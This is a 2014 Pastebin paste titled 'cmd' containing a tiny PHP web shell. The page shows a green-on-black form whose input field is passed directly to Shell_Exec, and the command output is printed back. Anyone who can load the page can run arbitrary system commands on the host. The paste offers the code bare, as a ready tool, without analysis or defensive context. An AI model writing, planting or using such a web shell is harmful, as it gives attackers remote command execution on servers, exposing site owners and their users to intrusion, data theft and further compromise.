Advertisement
FeRR4L

cmd

Apr 23rd, 2014
163
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.29 KB | None | 0 0
  1. <html>
  2. <body bgcolor=#000000 text=#00ff00 ">
  3. <form method=POST>
  4. <br>
  5. <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
  6. style="background:#000000;color:#ffffff;">
  7. <hr>
  8. <pre>
  9. <? $cmd = $_REQUEST["-cmd"];?>
  10. <? if($cmd != "") print Shell_Exec($cmd);?>
  11. </pre>
  12. </form>
  13. </body>
  14. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement